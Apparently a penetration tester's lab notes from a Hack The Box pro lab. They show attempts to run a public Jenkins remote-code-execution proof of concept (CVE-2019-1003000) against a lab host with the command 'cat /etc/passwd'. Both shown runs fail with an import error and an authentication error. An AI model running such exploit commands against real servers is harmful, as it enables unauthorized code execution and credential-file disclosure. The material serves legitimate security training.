https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc/blob/master/exploit.py#L3
# python2 
```bash
┌──(kali㉿gobots)-[26Apr2024 22:43:55]-[~/SUT/Genesis_proLab_htB/malware/cve-2019-1003000-jenkins-rce-poc-master]                                                                                           
└─$ python2 exploit.py --url http://10.10.110.102:8080 --job job_name --username your_user --password your_passwd --cmd "cat /etc/passwd"                                                                   
Traceback (most recent call last):                                                                                                                                                                          
  File "exploit.py", line 10, in <module>                                                                                                                                                                   
    import jenkins                                                                                                                                                                                          
ImportError: No module named jenkins        
```
# python 3
```bash
┌──(kali㉿gobots)-[26Apr2024 22:46:31]-[~/SUT/Genesis_proLab_htB/malware/cve-2019-1003000-jenkins-rce-poc-master]                                                                                           
└─$ python exploitpy3.py --url http://10.10.110.102:8080 --job job_name --username your_user --password your_passwd --cmd "cat /etc/passwd"                                                        [10/1569]
[+] connecting to jenkins...                                                                                                                                                                                
[+] crafting payload...                                                                                                                                                                                     
Traceback (most recent call last):                                                                                                                                                                          
  File "/home/kali/.local/lib/python3.11/site-packages/jenkins/__init__.py", line 582, in jenkins_request                                                                                                   
    return self._response_handler(                                                                                                                                                                          
           ^^^^^^^^^^^^^^^^^^^^^^^                                                                                                                                                                          
  File "/home/kali/.local/lib/python3.11/site-packages/jenkins/__init__.py", line 533, in _response_handler                                                                                                 
    response.raise_for_status()                                                                                                                                                                             
  File "/home/kali/.local/lib/python3.11/site-packages/requests/models.py", line 940, in raise_for_status                                                                                                   
    raise HTTPError(http_error_msg, response=self)                                                                                                                                                          
requests.exceptions.HTTPError: 401 Client Error: Invalid password/token for user: your_user for url: http://10.10.110.102:8080/crumbIssuer/api/json

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/kali/SUT/Genesis_proLab_htB/malware/cve-2019-1003000-jenkins-rce-poc-master/exploitpy3.py", line 66, in <module>
    run_command(args.url, args.cmd, args.job, args.username, args.password)
  File "/home/kali/SUT/Genesis_proLab_htB/malware/cve-2019-1003000-jenkins-rce-poc-master/exploitpy3.py", line 24, in run_command
    ori_job_config = server.get_job_config(job_name)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/lib/python3.11/site-packages/jenkins/__init__.py", line 1210, in get_job_config
    return self.jenkins_open(request)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/lib/python3.11/site-packages/jenkins/__init__.py", line 564, in jenkins_open 
    return self.jenkins_request(req, add_crumb, resolve_auth).text
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/lib/python3.11/site-packages/jenkins/__init__.py", line 580, in jenkins_request
    self.maybe_add_crumb(req)
  File "/home/kali/.local/lib/python3.11/site-packages/jenkins/__init__.py", line 369, in maybe_add_crumb
    response = self.jenkins_open(requests.Request(
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/lib/python3.11/site-packages/jenkins/__init__.py", line 564, in jenkins_open 
    return self.jenkins_request(req, add_crumb, resolve_auth).text
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/lib/python3.11/site-packages/jenkins/__init__.py", line 594, in jenkins_request
    raise JenkinsException(msg)
jenkins.JenkinsException: Error in request. Possibly authentication failed [401]: Invalid password/token for user: your_user
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 401 Invalid password/token for user: your_user</title>
</head>


```